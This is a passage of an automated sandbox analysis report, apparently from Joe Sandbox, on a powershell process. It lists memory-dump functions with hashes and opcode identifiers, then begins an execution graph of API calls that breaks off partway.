                                                                                                                                                                                                                                • Source File: 00000046.00000002.2701504962.000000000416D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0416D000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_416d000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 80c73fec29d2d3ac556010a6a0520254a0d48df3615c08815a7c49302dd7a8e0
                                                                                                                                                                                                                                • Instruction ID: febcfc2cb9d4893b680b794fdd49e983a6f5cfabc8b269b102feb5ca615d7390
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80c73fec29d2d3ac556010a6a0520254a0d48df3615c08815a7c49302dd7a8e0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B015E6110E3C09FD7128B259C94B52BFB4EF53224F1DC1CBD8888F1A3C2699849C772
                                                                                                                                                                                                                                Function 041E8F40 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 65860c9e54740533579cd0f849482f6e8c122604a72fa70e45d75bf8528d2940
                                                                                                                                                                                                                                • Instruction ID: c2752e52813e7abaefa68d218c70e2128dc95f044ed1200a56c20247a02de37a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65860c9e54740533579cd0f849482f6e8c122604a72fa70e45d75bf8528d2940
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E101F2343002004FE3065B54C858A6A7BB2EFC5319F0A80B5D5059F396CF35EC128B94
                                                                                                                                                                                                                                Function 041E86C8 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: b7ad1c28fc773a39aade0b5e36dd14996624ec7b3fc9d22bb4c1d60418d22139
                                                                                                                                                                                                                                • Instruction ID: 08c6858c1176e1ee332be91e462e6b56b3da577c8bfc622d4bc8b19b616879b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7ad1c28fc773a39aade0b5e36dd14996624ec7b3fc9d22bb4c1d60418d22139
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2010C75E00609DFDB10DFAAC48499EBBF5AF4C220F25C155E928A7360CB309D40DF64
                                                                                                                                                                                                                                Function 041EF3E0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7a387e85d69bee65e893d55c91571cc88a67638a459407230b2787d02ef028ff
                                                                                                                                                                                                                                • Instruction ID: 95c7ef3c905cbf5e5ab03334b75b71ff07db132de277658bb4ee6f0a9f8f8df9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a387e85d69bee65e893d55c91571cc88a67638a459407230b2787d02ef028ff
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC012CB4D0430AEFDB54DFAAC845A6EBFF0BF04314F514699D924E7242D774A6418F90
                                                                                                                                                                                                                                Function 041E87A8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: e13b949e3820617e90688c3536a83eed3fdcae30a80c3ffbe561620106f0b152
                                                                                                                                                                                                                                • Instruction ID: 178093a81450851e32b129d7f26905a6542c887df7ed3bd8ddfa14652039b4bc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e13b949e3820617e90688c3536a83eed3fdcae30a80c3ffbe561620106f0b152
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50F024F67082506FC3105BAEAC84826BFE9EFCD25035640AAF505C7321DA70EC15C7A0
                                                                                                                                                                                                                                Function 07E111F0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bf7b41f8cc996fcef712b7b5c434da177afd0dedd958a31ef522becfd9ac52b6
                                                                                                                                                                                                                                • Instruction ID: 0cc591bb1602e31b43256f844bb515f2ad5c48398da922c6881586c4f543f987
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf7b41f8cc996fcef712b7b5c434da177afd0dedd958a31ef522becfd9ac52b6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F0E231305205EFC3185F25D866AAA77AAAFC2365F0440BFE605CB241CF309C45CBB1
                                                                                                                                                                                                                                Function 041E8759 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 56f9e16e0e97dc73d32acfce189a9556c89248ca538d0bd6c9357ee40a316a45
                                                                                                                                                                                                                                • Instruction ID: 940844209e1cf691d4d3df445df5dc04a9933fcdf92f88fd849f46add83c09fe
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56f9e16e0e97dc73d32acfce189a9556c89248ca538d0bd6c9357ee40a316a45
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F082763042516FC3055B6DDC8880ABBA9EF8E3203154067F905C7362DB71EC258B60
                                                                                                                                                                                                                                Function 041EF3F0 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 1aeed7d265569d46890466190272ca5f610b439debfae60de5ded455930f2dc0
                                                                                                                                                                                                                                • Instruction ID: c45b26e805a3ce6eb86cc14654064e221d8eae6ddfbbf477400427704c849460
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1aeed7d265569d46890466190272ca5f610b439debfae60de5ded455930f2dc0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44F0B7B4E0420AEFDB54DFAAD845ABEBBF4AB48300F5145A9D918E7241E77496018B90
                                                                                                                                                                                                                                Function 07E120F8 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 498740da2633c5975fdb0956d76ac8117b6c9778dee43df39a1abd27bfe3a33f
                                                                                                                                                                                                                                • Instruction ID: 391b80c88c27a6e92bef20e480cfa783cda2671d6c5a7ee2d3dfb1c4c85e85fa
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 498740da2633c5975fdb0956d76ac8117b6c9778dee43df39a1abd27bfe3a33f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7AF03AB5B02219DFDF14CF80CD46BEEBBB5BB88318F205119D905BB250D7745A80CBA1
                                                                                                                                                                                                                                Function 041EC7A0 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 434f3ea12dc3b4e8907481c9b9cbcbdea2cac1eb9acc4ad1f74f0cd6d4ed10f9
                                                                                                                                                                                                                                • Instruction ID: 6272b2bbcc93270491a4973f6018b792232a9b5f379dcc8902313acddc549269
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 434f3ea12dc3b4e8907481c9b9cbcbdea2cac1eb9acc4ad1f74f0cd6d4ed10f9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39F02775A0410CEFD700DFA0E9547DD7BF2EB89314F2000A9D80957394DE312E50CB51
                                                                                                                                                                                                                                Function 041E8768 Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7cdf53b2ea0636bcbd444826f25e36053895e80e663b7084ab87bfcb682e8995
                                                                                                                                                                                                                                • Instruction ID: ed056877eda43f305fb933932fc096e20163935db5f444b70595aaad59aadf8d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7cdf53b2ea0636bcbd444826f25e36053895e80e663b7084ab87bfcb682e8995
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31E04FB63102146BC7049AAEE884D4AFBEAEBCD620715403AF909C7321CA71EC1587A0
                                                                                                                                                                                                                                Function 07E11068 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 489c04decc7ab4a84387e0544149bd737a1e3e7c440f5d43371f05fa26c6746c
                                                                                                                                                                                                                                • Instruction ID: 93409c6f763ffce473942d2e2b73de99f5e82fad7ef867cd8741fe9459c34a2e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 489c04decc7ab4a84387e0544149bd737a1e3e7c440f5d43371f05fa26c6746c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8DE0C27174E2901BC702126DB81048ABF6E4DC323031E00A3D148C7693CE104C41C7EA
                                                                                                                                                                                                                                Function 041EC7B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3003fbd467b7fabc3db487d9312a1a12c79c4d9e363563554194d83996b04bcb
                                                                                                                                                                                                                                • Instruction ID: c478fc9329f239621374e45804037e664ea98fd17dd33f1cf1b8839c711fa978
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3003fbd467b7fabc3db487d9312a1a12c79c4d9e363563554194d83996b04bcb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AE01275A0010CEFD704EFA0EA5566DBBF7EB89304F1051A8D90997354DE326F14DB51
                                                                                                                                                                                                                                Function 041EF3B0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 162353d2d81c3174da79df585873e7ee2236cc4e9dccf73dd75578b2381935ef
                                                                                                                                                                                                                                • Instruction ID: 5459d006606028d49c6f1a3eee675df9a6e06b59deca9886d41bcd44066a5a82
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 162353d2d81c3174da79df585873e7ee2236cc4e9dccf73dd75578b2381935ef
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D02B323441241FC740932CE4109D93BEC8F4A728B0180A7E40CC7752CD55DC414BC9
                                                                                                                                                                                                                                Function 041EF490 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3f82e551e62d3829ac2aafb306f60ecf5ec8763ac75e01d483c00e6281cc04a1
                                                                                                                                                                                                                                • Instruction ID: 6776d09985dce2a238668013e946b71697dea110b1564f172771b6518fd61d30
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f82e551e62d3829ac2aafb306f60ecf5ec8763ac75e01d483c00e6281cc04a1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBD0A73620410C5FE741EFD5E484E6277E9EF54704F0080B1EE488B121EB75F564A791
                                                                                                                                                                                                                                Function 07E118F8 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 223bdfd803351f1f04179248d8139ef3e0bf45d1549e131da243a894a0ffb9da
                                                                                                                                                                                                                                • Instruction ID: 4f53fcc8bbdb146419e73af7835ede95ab43546d648fa51676a53d7b8212434d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 223bdfd803351f1f04179248d8139ef3e0bf45d1549e131da243a894a0ffb9da
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0E0ECF0B5611ECBDB15DF80CD16BED7BB87B49304F201415D202BA550DBB80A80C765
                                                                                                                                                                                                                                Function 07E11078 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2740304800.0000000007E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E10000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7e10000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 29236afc58392a863d1e2c8224bd0e8afc2426cde827a0284f88c6d0b3ef3705
                                                                                                                                                                                                                                • Instruction ID: b6a59d30e56fdffc11dc7918fe4564bd3b7cab2afce534d2aa3815dcb883dc96
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29236afc58392a863d1e2c8224bd0e8afc2426cde827a0284f88c6d0b3ef3705
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AC08C72309424230508304F280189FE6DE89C9830309003BE20CE3300CCA04C4282EA
                                                                                                                                                                                                                                Function 041EF3C0 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 47801d3a4c9fe9358672337e8b58069643e0d9c45d67b9a3bb0a8c7f0cb51140
                                                                                                                                                                                                                                • Instruction ID: 44c0f43fa137c9e397e09a1c6915deb1dc9b060aa524e6dc88aecf9002e0cb19
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47801d3a4c9fe9358672337e8b58069643e0d9c45d67b9a3bb0a8c7f0cb51140
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8C012313101244BC704975CE414D6977DD9B89729B1140A6E50DCB361CD92EC0147C9
                                                                                                                                                                                                                                Function 041E99B8 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 33e55a7a07473ae50e78eeebc2d12e024a72cae72a6fae3380b268155e8bf2a4
                                                                                                                                                                                                                                • Instruction ID: bccbf0fc0bd89f7240fd772755bb0f5a8bf7544c98d0587ffa744a6b8a2eb36e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33e55a7a07473ae50e78eeebc2d12e024a72cae72a6fae3380b268155e8bf2a4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AC08CEA00CBC02DD3535B70A8A48553F705E6362030501C3F1C09A8E38A1918B5D763
                                                                                                                                                                                                                                Function 041E4840 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2705925408.00000000041E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041E0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_41e0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 5e17aeaf25467352eba785900af4313ff857286415d80b93436ed919dd8df194
                                                                                                                                                                                                                                • Instruction ID: c8dbaf2ccac1a3336b724218a95677205d3728f16361958ff494f26b5770a1f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e17aeaf25467352eba785900af4313ff857286415d80b93436ed919dd8df194
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66B012FD2E8D41B1590473B64DD0A7AD800EBB2B01B018C25B309C005486719474A21B

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 071803E0 Relevance: 5.1, Strings: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000046.00000002.2737955973.0000000007180000.00000040.00000800.00020000.00000000.sdmp, Offset: 07180000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_70_2_7180000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                                                                                                                • Opcode ID: 215509026ae3885664f57c92b189354a19ffbff6e182717dbedef84e3a191b66
                                                                                                                                                                                                                                • Instruction ID: ff3acae28a1e18c23503caf87893c8de60cfe863c8dc561511cd641a449348b0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 215509026ae3885664f57c92b189354a19ffbff6e182717dbedef84e3a191b66
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0701D671B4A38A9FC37E26291820516AFB79BC6A5072E049BD081DF396CE558C4D83A3

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:7.9%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:2.3%
                                                                                                                                                                                                                                Total number of Nodes:1213
                                                                                                                                                                                                                                Total number of Limit Nodes:29
                                                                                                                                                                                                                                execution_graph 38251 7ff6faa8231c 38252 7ff6faa8238c 38251->38252 38253 7ff6faa82342 GetModuleHandleW 38251->38253 38264 7ff6faa86938 EnterCriticalSection 38252->38264 38253->38252 38257 7ff6faa8234f 38253->38257 38255 7ff6faa86998 fflush LeaveCriticalSection 38256 7ff6faa82460 38255->38256 38260 7ff6faa8246c 38256->38260 38262 7ff6faa82488 11 API calls 38256->38262 38257->38252 38265 7ff6faa824d4 GetModuleHandleExW 38257->38265 38258 7ff6faa82410 38258->38255 38259 7ff6faa82396 38259->38258 38263 7ff6faa843b8 16 API calls 38259->38263 38262->38260 38263->38258 38266 7ff6faa82525 38265->38266 38267 7ff6faa824fe GetProcAddress 38265->38267 38268 7ff6faa82535 38266->38268 38269 7ff6faa8252f FreeLibrary 38266->38269 38267->38266 38270 7ff6faa82518 38267->38270 38268->38252 38269->38268 38270->38266 38271 7ff6faa7b0fc 38290 7ff6faa7aa8c 38271->38290 38275 7ff6faa7b148 38281 7ff6faa7b169 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 38275->38281 38298 7ff6faa8472c 38275->38298 38276 7ff6faa7b123 __scrt_acquire_startup_lock 38276->38275 38346 7ff6faa7b52c 7 API calls memcpy_s 38276->38346 38279 7ff6faa7b16d 38280 7ff6faa7b1f7 38302 7ff6faa83fc4 38280->38302 38281->38279 38281->38280 38347 7ff6faa82574 35 API calls FindHandlerForForeignException 38281->38347 38288 7ff6faa7b220 38348 7ff6faa7ac64 8 API calls 2 library calls 38288->38348 38291 7ff6faa7aaae __isa_available_init 38290->38291 38349 7ff6faa7e2f8 38291->38349 38297 7ff6faa7aab7 38297->38276 38345 7ff6faa7b52c 7 API calls memcpy_s 38297->38345 38300 7ff6faa84744 38298->38300 38299 7ff6faa84766 38299->38281 38300->38299 38398 7ff6faa7b010 38300->38398 38303 7ff6faa83fd4 38302->38303 38305 7ff6faa7b20c 38302->38305 38490 7ff6faa83c84 38303->38490 38306 7ff6faa57e20 38305->38306 38539 7ff6faa6b470 GetModuleHandleW 38306->38539 38312 7ff6faa57e58 SetErrorMode GetModuleHandleW 38313 7ff6faa648cc 21 API calls 38312->38313 38314 7ff6faa57e7d 38313->38314 38315 7ff6faa63e48 137 API calls 38314->38315 38316 7ff6faa57e90 38315->38316 38317 7ff6faa33d3c 126 API calls 38316->38317 38318 7ff6faa57e9c 38317->38318 38319 7ff6faa7a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38318->38319 38320 7ff6faa57ead 38319->38320 38321 7ff6faa57ebf 38320->38321 38322 7ff6faa33f18 70 API calls 38320->38322 38323 7ff6faa34d1c 157 API calls 38321->38323 38322->38321 38324 7ff6faa57ed6 38323->38324 38325 7ff6faa57eef 38324->38325 38326 7ff6faa36ad0 154 API calls 38324->38326 38327 7ff6faa34d1c 157 API calls 38325->38327 38328 7ff6faa57ee7 38326->38328 38329 7ff6faa57eff 38327->38329 38331 7ff6faa34e48 160 API calls 38328->38331 38330 7ff6faa57f0d 38329->38330 38333 7ff6faa57f14 38329->38333 38332 7ff6faa6b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38330->38332 38331->38325 38332->38333 38334 7ff6faa34888 58 API calls 38333->38334 38335 7ff6faa57f57 38334->38335 38336 7ff6faa34fd0 268 API calls 38335->38336 38337 7ff6faa57f5f 38336->38337 38338 7ff6faa57f9e 38337->38338 38339 7ff6faa57f8c 38337->38339 38343 7ff6faa7b684 GetModuleHandleW 38338->38343 38340 7ff6faa6b650 CreateEventW CloseHandle CreateEventW GetLastError CloseHandle 38339->38340 38341 7ff6faa57f93 38340->38341 38341->38338 38342 7ff6faa6b57c 14 API calls 38341->38342 38342->38338 38344 7ff6faa7b698 38343->38344 38344->38288 38345->38276 38346->38275 38347->38280 38348->38279 38350 7ff6faa7e301 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize_winapi_thunks 38349->38350 38362 7ff6faa7eb08 38350->38362 38353 7ff6faa7aab3 38353->38297 38357 7ff6faa845e4 38353->38357 38355 7ff6faa7e318 38355->38353 38369 7ff6faa7eb50 DeleteCriticalSection 38355->38369 38359 7ff6faa89d4c 38357->38359 38358 7ff6faa7aac0 38358->38297 38361 7ff6faa7e32c 8 API calls 3 library calls 38358->38361 38359->38358 38386 7ff6faa866c0 38359->38386 38361->38297 38363 